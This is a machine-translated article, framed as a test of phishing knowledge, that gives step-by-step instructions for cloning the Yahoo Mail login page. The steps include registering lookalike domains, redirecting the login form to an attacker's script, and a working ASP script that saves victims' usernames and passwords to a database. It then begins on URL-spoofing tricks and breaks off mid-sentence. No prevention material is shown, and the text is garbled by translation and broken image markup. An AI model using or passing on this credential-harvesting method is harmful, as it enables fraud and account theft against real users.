Measure the test taker's knowledge about the implementation and prevention of phishing.

Phishing has received more and more attention due to its serious harm to the interests of netizens and the Internet Reputation System. An Anti-Phishing Group (APWG, Anti-Phishing Working Group) has been set up internationally ), this is a joint agency with approximately 800 members from approximately 490 financial service companies, technical companies, service providers, national law enforcement agencies, and legislature, these organizations are responsible for providing industry share holders with a confidential forum to discuss phishing issues. The anti-phishing team tries to define the scope of phishing in two aspects: hard cost and soft cost by holding meetings and discussions in electronic form among members, sharing information and best practices to eliminate existing problems. We hope to completely eliminate the phishing trap in the near future and give everyone a sincere and honest Internet.

I. Principles of phishing:

The term Phishing is a combination of "Fishing" and "Phone". Because the hacker initiated a crime by Phone, he replaced "F" with "Ph ", "Phishing" is created, and the Phishing pronunciation is the same as that of Fishing. In itself, "phishing" is not an independent attack method. More is just a fraud method, just like some frauds in the real society. Attackers use fraudulent emails and forged Web sites to defraud visitors to provide personal information, such as credit card numbers, accounts, passwords, and Social Security numbers (typically, information related to finance and accounts is used to obtain illegitimate interests ), scammers often disclose their financial data.

Nowadays, the technical means of phishing are becoming more and more complex, such as malicious code hidden in images and key record programs. Of course, there are also fake websites with the same appearance as legitimate websites, these fake websites can even display the lock-type security tags below the browser. Phishing techniques are getting increasingly tricky. Here we will first introduce the workflow of phishing. There are usually five phases:

498) this. style. width = 498; "border = 0>

Figure 1

1. The fishermen intrude into the primary server and steal users' names and email addresses.

2. The fisherman sends an email of a specific nature. 3. The victim accesses a fake website.

4. The victim provides the secret and the user information that the victim has obtained.

5. The fisherman uses the identity of the victim to access other network servers.

We have learned about Malicious spam. Here we want to implement and operate on the third type. Counterfeit the target website so that the target user can access the fake website to complete our deception.

II. Implementation Method

Next we will implement a simple webpage phishing page. You can add and modify the page as needed.

1. First, we apply for a space to store our webpage.

2. We apply for another domain name. In order to achieve the spoofing effect, we can apply for domain names similar to those of the websites we want to cheat: for example:Www.yahoo.comWe apply forWww.yaho.comAnd so on

If you cannot apply for these top-level domain names, we can also modify our second-level domain names.

For example, if our own domain name is tcbmail.com, we can add a second-level domain name for yahoo.tcbmail.com to increase the success rate of spoofing.

Bind our space address to our domain name

3. Select a target and modify the code.

Next, let's take a look at our targets for deception. Here we take yahoo as an example. We can also adopt similar methods for other websites.

Open the home page of yahoo Mail:Https://login.yahoo.com/config/mail ?. Intl = us 

498) this. style. width = 498; "border = 0>

Figure 2

View the original code. We can see this sentence.

This statement submits the value of the input form item to the processing webpage in the background.Https://login.yahoo.com/config/login? The opportunity is provided here. We can create a homepage for yahoo Mail, replace the submitted page with our own page, and process it through the background database, the password of the target account can be intercepted.

Next let's take a look at the specific operation

Save the home page of yahoo Mail to your local device.

Set

P>

Change

{FORM method = "post" action = "http: // our own domain name/test. asp" target = _ self}

Save as mail.html

4. Write test. asp to store the input values in our corresponding database. Here we can directly use the access database to use the following code to achieve our goal.

<%
Dim db, strcon, qq, pass, rs, strSql
Qq = Request ("username ")
Pass = Request ("passwd ")
Strcon = "Provider = Microsoft. Jet. OLEDB.4.0; Data Source =" & Server. mappath ("pass. mdb ")
Set db = Server. createobject ("ADODB. connection ")
Db. open strcon
StrSql = "insert into name (name, pass) VALUES (" & qq & "," & pass &")"
Db. Execute (strSql)
%>

5.upload the edited mail.html, test. asp, and pass. mdb to the space.

Access http: // our own domain name/mail.html

Does it show yahoo's email homepage?

When you enter the user name and password, the corresponding input has been stored in our own database pass. mdb, and spoofing is successful.

498) this. style. width = 498; "border = 0>

Figure 3

Of course, we are more aware of security than before. If you pay attention to the links we send, some careful friends will still notice the difference between the webpage and the actual situation.

However, if your domain name is highly fraudulent, your success will also be high.

For example:Http://mail.yaho.com.cn/mail.htmlDoes it look like

Or add a second-level domain name.

For example:Http://yahoo.duay.com/mail.htmlIt can also play a good deception Effect

If the domain name you apply for is similarWww.tiger.comWhat should we do?

The following describes several URL spoofing methods.

Iii. implementation skills

1. Special flag parsing Spoofing

In the HTTP specification, the complete format after the network protocol name is http: // IP: @ name: pass/. Only the first part of the IP address is required, "@" is followed by the username parameter